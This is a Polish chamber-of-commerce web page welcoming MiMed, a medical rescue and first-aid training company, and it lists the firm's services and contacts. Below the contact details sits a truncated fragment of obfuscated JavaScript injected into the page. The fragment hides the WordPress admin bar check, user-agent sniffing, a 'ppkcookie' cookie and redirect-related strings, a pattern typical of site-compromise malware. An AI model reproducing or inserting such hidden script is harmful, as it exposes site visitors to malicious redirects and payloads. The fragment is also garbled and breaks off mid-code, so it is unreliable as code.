Witamy nową firmę w Izbie! – MiMed | Północna Izba Gospodarcza w Koszalinie

MiMed jest firmą zajmującą się ratownictwem medycznym, specjalizującą się w wykonywaniu medycznych czynności ratunkowych w warunkach pozaszpitalnych, prowadzeniu szeroko pojętej edukacji i doradztwa z zakresu pierwszej pomocy i ratownictwa, a także wyposażenia podmiotów ratownictwa medycznego w umundurowanie ochronne i sprzęt pierwszej pomocy.

Swoją działalność realizuje poprzez:

  • pracę w zespołach wyjazdowych ratownictwa medycznego,
  • profesjonalne szkolenia z pierwszej pomocy i ratownictwa medycznego,
  • tworzenie systemów ratowniczych w przedsiębiorstwach i innych obiektach pożytku publicznego,
  • profesjonalne zabezpieczenia medyczne imprez,
  • wykonywanie profesjonalnych pokazów pierwszej pomocy i ratownictwa z użyciem ambulansu wyjazdowego

Kadrę firmy tworzą specjaliści w swoich dziedzinach: lekarze, ratownicy medyczni, specjaliści ratownictwa medycznego, ratownicy OSP KSRG, funkcjonariusze służb MSWiA.

Programy i plany wynikowe prowadzonych kursów i szkoleń uwzględniają najnowsze międzynarodowe wytyczne dotyczące resuscytacji i pierwszej pomocy tworzone w oparciu o wytyczne Europejskiej Rady Resuscytacji.

Szkolenia i kursy realizuje na terenie całego kraju. Program i tematykę szkolenia dostosowuje do potrzeb naszego klienta, a realizacja następuje w wyznaczonym przez klienta czasie i miejscu.

 

tel. kom.  506 592 481 

email – mimedszkolenia@gmail.com

http://www.facebook.com/ratownikmimed

'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m